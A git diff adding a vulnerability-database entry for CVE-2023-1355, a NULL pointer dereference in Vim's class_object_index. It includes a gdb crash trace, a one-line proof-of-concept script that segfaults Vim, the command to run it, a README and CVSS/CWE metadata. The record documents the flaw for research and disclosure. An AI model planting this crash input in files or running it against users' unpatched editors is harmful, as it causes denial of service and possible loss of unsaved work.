diff --git a/cve/vim/2023/CVE-2023-1355/Debug.txt b/cve/vim/2023/CVE-2023-1355/Debug.txt
new file mode 100644
index 0000000000000000000000000000000000000000..487810bac814b52c17a51701a8c6e7bc99ca42fb
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1355/Debug.txt
@@ -0,0 +1,108 @@
+gdb-peda$ r -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa!
+Starting program: /home/user/recentvim/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa!
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGSEGV, Segmentation fault.
+Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
+Use 'set logging enabled off'.
+
+Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
+Use 'set logging enabled on'.
+
+
+[----------------------------------registers-----------------------------------]
+RAX: 0x0
+RBX: 0x0
+RCX: 0x2
+RDX: 0x55555569ba29 (: endbr64)
+RSI: 0x0
+RDI: 0x555555969673 --> 0x210000000061 ('a')
+RBP: 0x7fffffffbc80 --> 0x7fffffffbd20 --> 0x7fffffffbda0 --> 0x7fffffffbe20 --> 0x7fffffffbeb0 --> 0x7fffffffbff0 (--> ...)
+RSP: 0x7fffffffb9f0 --> 0x100000000
+RIP: 0x5555558074d1 (: mov eax,DWORD PTR [rax+0x40])
+R8 : 0x1
+R9 : 0x55555596c710 ("E1004: White space required before and after '=' at \"\t=null_class.a\"")
+R10: 0x55555596ccc0 --> 0x570
+R11: 0xa ('\n')
+R12: 0x7fffffffddf8 --> 0x7fffffffe1fe ("/home/user/recentvim/vim/src/vim")
+R13: 0x55555588a9b7 (: endbr64)
+R14: 0x555555906038 --> 0x55555558cac0 (<__do_global_dtors_aux>: endbr64)
+R15: 0x7ffff7ffd040 --> 0x7ffff7ffe2e0 --> 0x555555554000 --> 0x10102464c457f
+EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
+[-------------------------------------code-------------------------------------]
+ 0x5555558074c1 : jmp 0x55555580750d
+ 0x5555558074c3 : add DWORD PTR [rbp-0x254],0x1
+ 0x5555558074ca : mov rax,QWORD PTR [rbp-0x238]
+=> 0x5555558074d1 : mov eax,DWORD PTR [rax+0x40]
+ 0x5555558074d4 : cmp DWORD PTR [rbp-0x254],eax
+ 0x5555558074da : jl 0x5555558073be
+ 0x5555558074e0 : mov rax,QWORD PTR [rbp-0x238]
+ 0x5555558074e7 : mov rax,QWORD PTR [rax]
+[------------------------------------stack-------------------------------------]
+0000| 0x7fffffffb9f0 --> 0x100000000
+0008| 0x7fffffffb9f8 --> 0x7fffffffc510 --> 0x1
+0016| 0x7fffffffba00 --> 0x7fffffffc500 --> 0x10
+0024| 0x7fffffffba08 --> 0x7fffffffc440 --> 0x555555969673 --> 0x210000000061 ('a')
+0032| 0x7fffffffba10 --> 0x0
+0040| 0x7fffffffba18 --> 0x0
+0048| 0x7fffffffba20 --> 0x0
+0056| 0x7fffffffba28 --> 0x0
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+Stopped reason: SIGSEGV
+0x00005555558074d1 in class_object_index (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at vim9class.c:1356
+1356 for (int i = 0; i < cl->class_class_member_count; ++i)
+gdb-peda$ bt
+#0 0x00005555558074d1 in class_object_index (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at vim9class.c:1356
+#1 0x00005555555f3045 in handle_subscript (arg=0x7fffffffc440, name_start=0x0, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at eval.c:6934
+#2 0x00005555555ee0f3 in eval9 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:4310
+#3 0x00005555555ed2bb in eval8 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:3840
+#4 0x00005555555ecd0b in eval7 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:3644
+#5 0x00005555555ec452 in eval6 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3423
+#6 0x00005555555ec114 in eval5 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3312
+#7 0x00005555555ebbe8 in eval4 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3163
+#8 0x00005555555eb6f7 in eval3 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3024
+#9 0x00005555555eb21f in eval2 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:2898
+#10 0x00005555555eaad2 in eval1 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:2744
+#11 0x00005555555ea85a in eval0_retarg (arg=0x555555969668 "null_class.a", rettv=0x7fffffffc500, eap=0x7fffffffc6a0, evalarg=0x7fffffffc510, retarg=0x0) at eval.c:2655
+#12 0x00005555555ea69b in eval0 (arg=0x555555969668 "null_class.a", rettv=0x7fffffffc500, eap=0x7fffffffc6a0, evalarg=0x7fffffffc510) at eval.c:2589
+#13 0x0000555555608779 in ex_let (eap=0x7fffffffc6a0) at evalvars.c:1149
+#14 0x0000555555607eb8 in ex_var (eap=0x7fffffffc6a0) at evalvars.c:960
+#15 0x000055555562314c in do_one_cmd (cmdlinep=0x7fffffffc8d0, flags=0x7, cstack=0x7fffffffc9b0, fgetline=0x55555575fe37 , cookie=0x7fffffffd120) at ex_docmd.c:2580
+#16 0x000055555562009e in do_cmdline (cmdline=0x55555596c350 "vim9@_\t=null_class.a", fgetline=0x55555575fe37 , cookie=0x7fffffffd120, flags=0x7) at ex_docmd.c:993
+#17 0x000055555575eca8 in do_source_ext (fname=0x555555968893 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0, eap=0x0, clearvars=0x0) at scriptfile.c:1759
+#18 0x000055555575f3a3 in do_source (fname=0x555555968893 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0) at scriptfile.c:1905
+#19 0x000055555575de5f in cmd_source (fname=0x555555968893 "poc", eap=0x7fffffffd2d0) at scriptfile.c:1250
+#20 0x000055555575dea6 in ex_source (eap=0x7fffffffd2d0) at scriptfile.c:1276
+#21 0x000055555562314c in do_one_cmd (cmdlinep=0x7fffffffd500, flags=0xb, cstack=0x7fffffffd5e0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
+#22 0x000055555562009e in do_cmdline (cmdline=0x555555968850 "so poc", fgetline=0x0, cookie=0x0, flags=0xb) at ex_docmd.c:993
+#23 0x000055555561f535 in do_cmdline_cmd (cmd=0x555555968850 "so poc") at ex_docmd.c:587
+#24 0x000055555588e6da in exe_commands (parmp=0x555555953800 ) at main.c:3146
+#25 0x000055555588b50f in vim_main2 () at main.c:782
+#26 0x000055555588ae7c in main (argc=0xf, argv=0x7fffffffddf8) at main.c:433
+#27 0x00007ffff7c29d90 in __libc_start_call_main (main=main@entry=0x55555588a9b7, argc=argc@entry=0xf, argv=argv@entry=0x7fffffffddf8) at ../sysdeps/nptl/libc_start_call_main.h:58
+#28 0x00007ffff7c29e40 in __libc_start_main_impl (main=0x55555588a9b7, argc=0xf, argv=0x7fffffffddf8, init=, fini=, rtld_fini=,
+ stack_end=0x7fffffffdde8) at ../csu/libc-start.c:392
+#29 0x000055555558ca45 in _start ()
+gdb-peda$ p cl
+$1 = (class_T *) 0x0
+gdb-peda$ p *(typval_T *) rettv
+$2 = {
+ v_type = VAR_CLASS,
+ v_lock = 0x0,
+ vval = {
+ v_number = 0x0,
+ v_float = 0,
+ v_string = 0x0,
+ v_list = 0x0,
+ v_dict = 0x0,
+ v_partial = 0x0,
+ v_job = 0x0,
+ v_channel = 0x0,
+ v_blob = 0x0,
+ v_instr = 0x0,
+ v_class = 0x0,
+ v_object = 0x0
+ }
+}
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-1355/Proof of Concept.txt b/cve/vim/2023/CVE-2023-1355/Proof of Concept.txt
new file mode 100644
index 0000000000000000000000000000000000000000..59c79dad42e97098499aa62b31b1afdb9745d096
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1355/Proof of Concept.txt
@@ -0,0 +1,2 @@
+$ ./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa!
+Segmentation fault (core dumped)
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-1355/README.md b/cve/vim/2023/CVE-2023-1355/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..a075b8c79835968ef81a37c1c533cfaa371ebfc0
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1355/README.md
@@ -0,0 +1,13 @@
+ **Description**
+null pointer dereference in class_object_index at vim9class.c:1356
+variable cl in class_object_index at vim9class.c:1254 is NULL
+at last, reference to cl refers to NULL
+
+ **References to Advisories, Solutions, and Tools**
+By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov
+
+Hyperlink
+
+https://github.com/vim/vim/commit/d13dd30240e32071210f55b587182ff48757ea46
+
+https://huntr.dev/bounties/4d0a9615-d438-4f5c-8dd6-aa22f4b716d9
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-1355/poc.txt b/cve/vim/2023/CVE-2023-1355/poc.txt
new file mode 100644
index 0000000000000000000000000000000000000000..dc324c15affd456e82b513ec905a63acac2d3c79
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1355/poc.txt
@@ -0,0 +1 @@
+vim9@_ =null_class.a
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-1355.yaml b/cve/vim/2023/yaml/CVE-2023-1355.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..a954b3dfae4d14d0cf4bf63f0adc75df6f6b5243
--- /dev/null
+++ b/cve/vim/2023/yaml/CVE-2023-1355.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-1355
+source: https://huntr.dev/bounties/4d0a9615-d438-4f5c-8dd6-aa22f4b716d9
+info:
+ name: Vim是一款基于UNIX平台的编辑器,由vi发展而来。
+ severity: medium
+ description:
+ GitHub存储库vim/vim中的NULL指针解引用。
+ scope-of-influence:
+ vim < 9.0.1402
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-1355
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
+ cvss-score: 5.5
+ cve-id: CVE-2023-1355
+ cwe-id: CWE-476
+ cnvd-id: None
+ kve-id: None
+ tags: cve2023
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 428354b052e24bcd706182b37e638525cdc3550c..bc5382db27d0c7926d2a172b9c6f1aa9d48c2546 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -32,4 +32,6 @@ cve:
 - CVE-2022-0529
 django:
 - CVE-2022-34265
+ vim:
+ - CVE-2023-1355
 cnvd: